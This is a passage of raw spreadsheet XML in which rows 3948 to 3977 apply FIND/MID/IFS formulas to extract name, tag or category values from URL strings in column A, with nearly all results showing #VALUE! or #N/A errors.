    ISNUMBER(FIND("tag/",$A3948)), MID($A3948, FIND("tag/",$A3948) + 4, LEN($A3948) - FIND("tag/",$A3948)),
    ISNUMBER(FIND("category",$A3948)), MID($A3948, FIND("category",$A3948) + 9, LEN($A3948) - FIND("category",$A3948)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3948" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3949" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3949" t="s">
        <v>2260</v>
      </c>
      <c r="B3949" t="e">
        <f t="shared" si="184"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3949" t="e">
        <f t="shared" si="185"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3949" t="e">
        <f t="shared" si="186"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3949" t="e" cm="1">
        <f t="array" ref="E3949">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3949)), MID($A3949, FIND("name=",$A3949) + 5, LEN($A3949) - FIND("name=",$A3949)),
    ISNUMBER(FIND("tag/",$A3949)), MID($A3949, FIND("tag/",$A3949) + 4, LEN($A3949) - FIND("tag/",$A3949)),
    ISNUMBER(FIND("category",$A3949)), MID($A3949, FIND("category",$A3949) + 9, LEN($A3949) - FIND("category",$A3949)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3949" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3950" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3950" t="s">
        <v>2248</v>
      </c>
      <c r="B3950" t="e">
        <f t="shared" si="184"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3950" t="e">
        <f t="shared" si="185"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3950" t="e">
        <f t="shared" si="186"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3950" t="e" cm="1">
        <f t="array" ref="E3950">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3950)), MID($A3950, FIND("name=",$A3950) + 5, LEN($A3950) - FIND("name=",$A3950)),
    ISNUMBER(FIND("tag/",$A3950)), MID($A3950, FIND("tag/",$A3950) + 4, LEN($A3950) - FIND("tag/",$A3950)),
    ISNUMBER(FIND("category",$A3950)), MID($A3950, FIND("category",$A3950) + 9, LEN($A3950) - FIND("category",$A3950)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3950" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3951" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3951" t="s">
        <v>2874</v>
      </c>
      <c r="B3951" t="e">
        <f t="shared" si="184"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3951" t="e">
        <f t="shared" si="185"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3951" t="e">
        <f t="shared" si="186"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3951" t="e" cm="1">
        <f t="array" ref="E3951">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3951)), MID($A3951, FIND("name=",$A3951) + 5, LEN($A3951) - FIND("name=",$A3951)),
    ISNUMBER(FIND("tag/",$A3951)), MID($A3951, FIND("tag/",$A3951) + 4, LEN($A3951) - FIND("tag/",$A3951)),
    ISNUMBER(FIND("category",$A3951)), MID($A3951, FIND("category",$A3951) + 9, LEN($A3951) - FIND("category",$A3951)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3951" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3952" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3952" t="s">
        <v>2248</v>
      </c>
      <c r="B3952" t="e">
        <f t="shared" si="184"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3952" t="e">
        <f t="shared" si="185"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3952" t="e">
        <f t="shared" si="186"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3952" t="e" cm="1">
        <f t="array" ref="E3952">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3952)), MID($A3952, FIND("name=",$A3952) + 5, LEN($A3952) - FIND("name=",$A3952)),
    ISNUMBER(FIND("tag/",$A3952)), MID($A3952, FIND("tag/",$A3952) + 4, LEN($A3952) - FIND("tag/",$A3952)),
    ISNUMBER(FIND("category",$A3952)), MID($A3952, FIND("category",$A3952) + 9, LEN($A3952) - FIND("category",$A3952)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3952" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3953" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3953" t="s">
        <v>2601</v>
      </c>
      <c r="B3953" t="e">
        <f t="shared" si="184"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3953" t="e">
        <f t="shared" si="185"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3953" t="e">
        <f t="shared" si="186"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3953" t="e" cm="1">
        <f t="array" ref="E3953">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3953)), MID($A3953, FIND("name=",$A3953) + 5, LEN($A3953) - FIND("name=",$A3953)),
    ISNUMBER(FIND("tag/",$A3953)), MID($A3953, FIND("tag/",$A3953) + 4, LEN($A3953) - FIND("tag/",$A3953)),
    ISNUMBER(FIND("category",$A3953)), MID($A3953, FIND("category",$A3953) + 9, LEN($A3953) - FIND("category",$A3953)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3953" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3954" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3954" t="s">
        <v>2873</v>
      </c>
      <c r="B3954" t="e">
        <f t="shared" si="184"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3954" t="e">
        <f t="shared" si="185"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3954" t="e">
        <f t="shared" si="186"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3954" t="e" cm="1">
        <f t="array" ref="E3954">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3954)), MID($A3954, FIND("name=",$A3954) + 5, LEN($A3954) - FIND("name=",$A3954)),
    ISNUMBER(FIND("tag/",$A3954)), MID($A3954, FIND("tag/",$A3954) + 4, LEN($A3954) - FIND("tag/",$A3954)),
    ISNUMBER(FIND("category",$A3954)), MID($A3954, FIND("category",$A3954) + 9, LEN($A3954) - FIND("category",$A3954)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3954" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3955" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3955" t="s">
        <v>2873</v>
      </c>
      <c r="B3955" t="e">
        <f t="shared" si="184"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3955" t="e">
        <f t="shared" si="185"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3955" t="e">
        <f t="shared" si="186"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3955" t="e" cm="1">
        <f t="array" ref="E3955">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3955)), MID($A3955, FIND("name=",$A3955) + 5, LEN($A3955) - FIND("name=",$A3955)),
    ISNUMBER(FIND("tag/",$A3955)), MID($A3955, FIND("tag/",$A3955) + 4, LEN($A3955) - FIND("tag/",$A3955)),
    ISNUMBER(FIND("category",$A3955)), MID($A3955, FIND("category",$A3955) + 9, LEN($A3955) - FIND("category",$A3955)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3955" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3956" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3956" t="s">
        <v>2875</v>
      </c>
      <c r="B3956" t="e">
        <f t="shared" si="184"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3956" t="e">
        <f t="shared" si="185"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3956" t="e">
        <f t="shared" si="186"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3956" t="e" cm="1">
        <f t="array" ref="E3956">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3956)), MID($A3956, FIND("name=",$A3956) + 5, LEN($A3956) - FIND("name=",$A3956)),
    ISNUMBER(FIND("tag/",$A3956)), MID($A3956, FIND("tag/",$A3956) + 4, LEN($A3956) - FIND("tag/",$A3956)),
    ISNUMBER(FIND("category",$A3956)), MID($A3956, FIND("category",$A3956) + 9, LEN($A3956) - FIND("category",$A3956)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3956" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3957" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3957" t="s">
        <v>2876</v>
      </c>
      <c r="B3957" t="e">
        <f t="shared" si="184"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3957" t="e">
        <f t="shared" si="185"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3957" t="e">
        <f t="shared" si="186"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3957" t="e" cm="1">
        <f t="array" ref="E3957">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3957)), MID($A3957, FIND("name=",$A3957) + 5, LEN($A3957) - FIND("name=",$A3957)),
    ISNUMBER(FIND("tag/",$A3957)), MID($A3957, FIND("tag/",$A3957) + 4, LEN($A3957) - FIND("tag/",$A3957)),
    ISNUMBER(FIND("category",$A3957)), MID($A3957, FIND("category",$A3957) + 9, LEN($A3957) - FIND("category",$A3957)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3957" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3958" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3958" t="s">
        <v>2877</v>
      </c>
      <c r="B3958" t="e">
        <f t="shared" si="184"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3958" t="e">
        <f t="shared" si="185"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3958" t="e">
        <f t="shared" si="186"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3958" t="e" cm="1">
        <f t="array" ref="E3958">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3958)), MID($A3958, FIND("name=",$A3958) + 5, LEN($A3958) - FIND("name=",$A3958)),
    ISNUMBER(FIND("tag/",$A3958)), MID($A3958, FIND("tag/",$A3958) + 4, LEN($A3958) - FIND("tag/",$A3958)),
    ISNUMBER(FIND("category",$A3958)), MID($A3958, FIND("category",$A3958) + 9, LEN($A3958) - FIND("category",$A3958)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3958" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3959" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3959" t="s">
        <v>2878</v>
      </c>
      <c r="B3959" t="e">
        <f t="shared" si="184"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3959" t="e">
        <f t="shared" si="185"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3959" t="e">
        <f t="shared" si="186"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3959" t="e" cm="1">
        <f t="array" ref="E3959">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3959)), MID($A3959, FIND("name=",$A3959) + 5, LEN($A3959) - FIND("name=",$A3959)),
    ISNUMBER(FIND("tag/",$A3959)), MID($A3959, FIND("tag/",$A3959) + 4, LEN($A3959) - FIND("tag/",$A3959)),
    ISNUMBER(FIND("category",$A3959)), MID($A3959, FIND("category",$A3959) + 9, LEN($A3959) - FIND("category",$A3959)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3959" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3960" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3960" t="s">
        <v>2619</v>
      </c>
      <c r="B3960" t="e">
        <f t="shared" si="184"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3960" t="e">
        <f t="shared" si="185"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3960" t="e">
        <f t="shared" si="186"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3960" t="e" cm="1">
        <f t="array" ref="E3960">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3960)), MID($A3960, FIND("name=",$A3960) + 5, LEN($A3960) - FIND("name=",$A3960)),
    ISNUMBER(FIND("tag/",$A3960)), MID($A3960, FIND("tag/",$A3960) + 4, LEN($A3960) - FIND("tag/",$A3960)),
    ISNUMBER(FIND("category",$A3960)), MID($A3960, FIND("category",$A3960) + 9, LEN($A3960) - FIND("category",$A3960)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3960" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3961" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3961" t="s">
        <v>2604</v>
      </c>
      <c r="B3961" t="e">
        <f t="shared" si="184"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3961" t="e">
        <f t="shared" si="185"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3961" t="e">
        <f t="shared" si="186"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3961" t="e" cm="1">
        <f t="array" ref="E3961">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3961)), MID($A3961, FIND("name=",$A3961) + 5, LEN($A3961) - FIND("name=",$A3961)),
    ISNUMBER(FIND("tag/",$A3961)), MID($A3961, FIND("tag/",$A3961) + 4, LEN($A3961) - FIND("tag/",$A3961)),
    ISNUMBER(FIND("category",$A3961)), MID($A3961, FIND("category",$A3961) + 9, LEN($A3961) - FIND("category",$A3961)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3961" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3962" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3962" t="s">
        <v>2410</v>
      </c>
      <c r="B3962" t="e">
        <f t="shared" si="184"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3962" t="e">
        <f t="shared" si="185"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3962" t="e">
        <f t="shared" si="186"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3962" t="e" cm="1">
        <f t="array" ref="E3962">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3962)), MID($A3962, FIND("name=",$A3962) + 5, LEN($A3962) - FIND("name=",$A3962)),
    ISNUMBER(FIND("tag/",$A3962)), MID($A3962, FIND("tag/",$A3962) + 4, LEN($A3962) - FIND("tag/",$A3962)),
    ISNUMBER(FIND("category",$A3962)), MID($A3962, FIND("category",$A3962) + 9, LEN($A3962) - FIND("category",$A3962)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3962" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3963" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3963" t="s">
        <v>2605</v>
      </c>
      <c r="B3963" t="e">
        <f t="shared" si="184"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3963" t="e">
        <f t="shared" si="185"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3963" t="e">
        <f t="shared" si="186"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3963" t="e" cm="1">
        <f t="array" ref="E3963">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3963)), MID($A3963, FIND("name=",$A3963) + 5, LEN($A3963) - FIND("name=",$A3963)),
    ISNUMBER(FIND("tag/",$A3963)), MID($A3963, FIND("tag/",$A3963) + 4, LEN($A3963) - FIND("tag/",$A3963)),
    ISNUMBER(FIND("category",$A3963)), MID($A3963, FIND("category",$A3963) + 9, LEN($A3963) - FIND("category",$A3963)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3963" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3964" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3964" t="s">
        <v>2606</v>
      </c>
      <c r="B3964" t="e">
        <f t="shared" si="184"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3964" t="e">
        <f t="shared" si="185"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3964" t="e">
        <f t="shared" si="186"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3964" t="e" cm="1">
        <f t="array" ref="E3964">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3964)), MID($A3964, FIND("name=",$A3964) + 5, LEN($A3964) - FIND("name=",$A3964)),
    ISNUMBER(FIND("tag/",$A3964)), MID($A3964, FIND("tag/",$A3964) + 4, LEN($A3964) - FIND("tag/",$A3964)),
    ISNUMBER(FIND("category",$A3964)), MID($A3964, FIND("category",$A3964) + 9, LEN($A3964) - FIND("category",$A3964)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3964" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3965" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3965" t="s">
        <v>2512</v>
      </c>
      <c r="B3965" t="e">
        <f t="shared" si="184"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3965" t="e">
        <f t="shared" si="185"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3965" t="e">
        <f t="shared" si="186"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3965" t="e" cm="1">
        <f t="array" ref="E3965">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3965)), MID($A3965, FIND("name=",$A3965) + 5, LEN($A3965) - FIND("name=",$A3965)),
    ISNUMBER(FIND("tag/",$A3965)), MID($A3965, FIND("tag/",$A3965) + 4, LEN($A3965) - FIND("tag/",$A3965)),
    ISNUMBER(FIND("category",$A3965)), MID($A3965, FIND("category",$A3965) + 9, LEN($A3965) - FIND("category",$A3965)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3965" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3966" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3966" t="s">
        <v>2607</v>
      </c>
      <c r="B3966" t="e">
        <f t="shared" si="184"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3966" t="e">
        <f t="shared" si="185"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3966" t="e">
        <f t="shared" si="186"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3966" t="e" cm="1">
        <f t="array" ref="E3966">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3966)), MID($A3966, FIND("name=",$A3966) + 5, LEN($A3966) - FIND("name=",$A3966)),
    ISNUMBER(FIND("tag/",$A3966)), MID($A3966, FIND("tag/",$A3966) + 4, LEN($A3966) - FIND("tag/",$A3966)),
    ISNUMBER(FIND("category",$A3966)), MID($A3966, FIND("category",$A3966) + 9, LEN($A3966) - FIND("category",$A3966)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3966" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3967" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3967" t="s">
        <v>2608</v>
      </c>
      <c r="B3967" t="e">
        <f t="shared" si="184"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3967" t="e">
        <f t="shared" si="185"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3967" t="e">
        <f t="shared" si="186"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3967" t="e" cm="1">
        <f t="array" ref="E3967">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3967)), MID($A3967, FIND("name=",$A3967) + 5, LEN($A3967) - FIND("name=",$A3967)),
    ISNUMBER(FIND("tag/",$A3967)), MID($A3967, FIND("tag/",$A3967) + 4, LEN($A3967) - FIND("tag/",$A3967)),
    ISNUMBER(FIND("category",$A3967)), MID($A3967, FIND("category",$A3967) + 9, LEN($A3967) - FIND("category",$A3967)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3967" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3968" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3968" t="s">
        <v>2609</v>
      </c>
      <c r="B3968" t="e">
        <f t="shared" si="184"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3968" t="e">
        <f t="shared" si="185"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3968" t="e">
        <f t="shared" si="186"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3968" t="e" cm="1">
        <f t="array" ref="E3968">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3968)), MID($A3968, FIND("name=",$A3968) + 5, LEN($A3968) - FIND("name=",$A3968)),
    ISNUMBER(FIND("tag/",$A3968)), MID($A3968, FIND("tag/",$A3968) + 4, LEN($A3968) - FIND("tag/",$A3968)),
    ISNUMBER(FIND("category",$A3968)), MID($A3968, FIND("category",$A3968) + 9, LEN($A3968) - FIND("category",$A3968)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3968" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3969" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3969" t="s">
        <v>2611</v>
      </c>
      <c r="B3969" t="e">
        <f t="shared" si="184"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3969" t="e">
        <f t="shared" si="185"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3969" t="e">
        <f t="shared" si="186"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3969" t="e" cm="1">
        <f t="array" ref="E3969">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3969)), MID($A3969, FIND("name=",$A3969) + 5, LEN($A3969) - FIND("name=",$A3969)),
    ISNUMBER(FIND("tag/",$A3969)), MID($A3969, FIND("tag/",$A3969) + 4, LEN($A3969) - FIND("tag/",$A3969)),
    ISNUMBER(FIND("category",$A3969)), MID($A3969, FIND("category",$A3969) + 9, LEN($A3969) - FIND("category",$A3969)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3969" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3970" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3970" t="s">
        <v>2610</v>
      </c>
      <c r="B3970" t="e">
        <f t="shared" si="184"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3970" t="e">
        <f t="shared" si="185"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3970" t="e">
        <f t="shared" si="186"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3970" t="e" cm="1">
        <f t="array" ref="E3970">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3970)), MID($A3970, FIND("name=",$A3970) + 5, LEN($A3970) - FIND("name=",$A3970)),
    ISNUMBER(FIND("tag/",$A3970)), MID($A3970, FIND("tag/",$A3970) + 4, LEN($A3970) - FIND("tag/",$A3970)),
    ISNUMBER(FIND("category",$A3970)), MID($A3970, FIND("category",$A3970) + 9, LEN($A3970) - FIND("category",$A3970)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3970" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3971" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3971" t="s">
        <v>2612</v>
      </c>
      <c r="B3971" t="e">
        <f t="shared" si="184"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3971" t="e">
        <f t="shared" si="185"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3971" t="e">
        <f t="shared" si="186"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3971" t="e" cm="1">
        <f t="array" ref="E3971">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3971)), MID($A3971, FIND("name=",$A3971) + 5, LEN($A3971) - FIND("name=",$A3971)),
    ISNUMBER(FIND("tag/",$A3971)), MID($A3971, FIND("tag/",$A3971) + 4, LEN($A3971) - FIND("tag/",$A3971)),
    ISNUMBER(FIND("category",$A3971)), MID($A3971, FIND("category",$A3971) + 9, LEN($A3971) - FIND("category",$A3971)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3971" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3972" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3972" t="s">
        <v>2613</v>
      </c>
      <c r="B3972" t="e">
        <f t="shared" si="184"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3972" t="e">
        <f t="shared" si="185"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3972" t="e">
        <f t="shared" si="186"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3972" t="e" cm="1">
        <f t="array" ref="E3972">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3972)), MID($A3972, FIND("name=",$A3972) + 5, LEN($A3972) - FIND("name=",$A3972)),
    ISNUMBER(FIND("tag/",$A3972)), MID($A3972, FIND("tag/",$A3972) + 4, LEN($A3972) - FIND("tag/",$A3972)),
    ISNUMBER(FIND("category",$A3972)), MID($A3972, FIND("category",$A3972) + 9, LEN($A3972) - FIND("category",$A3972)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3972" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3973" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3973" t="s">
        <v>2613</v>
      </c>
      <c r="B3973" t="e">
        <f t="shared" si="184"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3973" t="e">
        <f t="shared" si="185"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3973" t="e">
        <f t="shared" si="186"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3973" t="e" cm="1">
        <f t="array" ref="E3973">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3973)), MID($A3973, FIND("name=",$A3973) + 5, LEN($A3973) - FIND("name=",$A3973)),
    ISNUMBER(FIND("tag/",$A3973)), MID($A3973, FIND("tag/",$A3973) + 4, LEN($A3973) - FIND("tag/",$A3973)),
    ISNUMBER(FIND("category",$A3973)), MID($A3973, FIND("category",$A3973) + 9, LEN($A3973) - FIND("category",$A3973)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3973" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3974" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3974" t="s">
        <v>2615</v>
      </c>
      <c r="B3974" t="e">
        <f t="shared" ref="B3974:B4037" si="187">IF(FIND("name=",A3974,1)&gt;0,MID(A3974,FIND("name=",A3974,1)+5,LEN(A3974)-FIND("name=",A3974,1)),"")</f>
        <v>#VALUE!</v>
      </c>
      <c r="C3974" t="e">
        <f t="shared" ref="C3974:C4037" si="188">IF(FIND("tag/",$A3974,1)&gt;0,MID($A3974,FIND("tag/",$A3974,1)+4,LEN($A3974)-FIND("tag/",$A3974,1)),"")</f>
        <v>#VALUE!</v>
      </c>
      <c r="D3974" t="e">
        <f t="shared" si="186"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3974" t="e" cm="1">
        <f t="array" ref="E3974">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3974)), MID($A3974, FIND("name=",$A3974) + 5, LEN($A3974) - FIND("name=",$A3974)),
    ISNUMBER(FIND("tag/",$A3974)), MID($A3974, FIND("tag/",$A3974) + 4, LEN($A3974) - FIND("tag/",$A3974)),
    ISNUMBER(FIND("category",$A3974)), MID($A3974, FIND("category",$A3974) + 9, LEN($A3974) - FIND("category",$A3974)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3974" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3975" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3975" t="s">
        <v>2614</v>
      </c>
      <c r="B3975" t="e">
        <f t="shared" si="187"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3975" t="e">
        <f t="shared" si="188"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3975" t="e">
        <f t="shared" si="186"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3975" t="e" cm="1">
        <f t="array" ref="E3975">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3975)), MID($A3975, FIND("name=",$A3975) + 5, LEN($A3975) - FIND("name=",$A3975)),
    ISNUMBER(FIND("tag/",$A3975)), MID($A3975, FIND("tag/",$A3975) + 4, LEN($A3975) - FIND("tag/",$A3975)),
    ISNUMBER(FIND("category",$A3975)), MID($A3975, FIND("category",$A3975) + 9, LEN($A3975) - FIND("category",$A3975)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3975" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3976" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3976" t="s">
        <v>2616</v>
      </c>
      <c r="B3976" t="e">
        <f t="shared" si="187"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3976" t="e">
        <f t="shared" si="188"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3976" t="e">
        <f t="shared" si="186"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3976" t="e" cm="1">
        <f t="array" ref="E3976">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3976)), MID($A3976, FIND("name=",$A3976) + 5, LEN($A3976) - FIND("name=",$A3976)),
    ISNUMBER(FIND("tag/",$A3976)), MID($A3976, FIND("tag/",$A3976) + 4, LEN($A3976) - FIND("tag/",$A3976)),
    ISNUMBER(FIND("category",$A3976)), MID($A3976, FIND("category",$A3976) + 9, LEN($A3976) - FIND("category",$A3976)))</f>
        <v>#N/A</v>
      </c>
      <c r="F3976" t="e">
        <v>#N/A</v>
      </c>
    </row>
    <row r="3977" spans="1:6" x14ac:dyDescent="0.35">
      <c r="A3977" t="s">
        <v>2617</v>
      </c>
      <c r="B3977" t="e">
        <f t="shared" si="187"/>
        <v>#VALUE!</v>
      </c>
      <c r="C3977" t="e">
        <f t="shared" si="188"/>
        <v>#VALUE!</v>
      </c>
      <c r="D3977" t="e">
        <f t="shared" si="186"/>
        <v>#VALUE!</v>
      </c>
      <c r="E3977" t="e" cm="1">
        <f t="array" ref="E3977">_xlfn.IFS(
    ISNUMBER(FIND("name=",$A3977)), MID($A3977, FIND("name=",$A3977) + 5, LEN($A3977) - FIND("name=",$A3977)),
    ISNUMBER(FIND("tag/",$A3977)), MID($A3977, FIND("tag/",$A3977) + 4, LEN($A3977) - FIND("tag/",$A3977)),
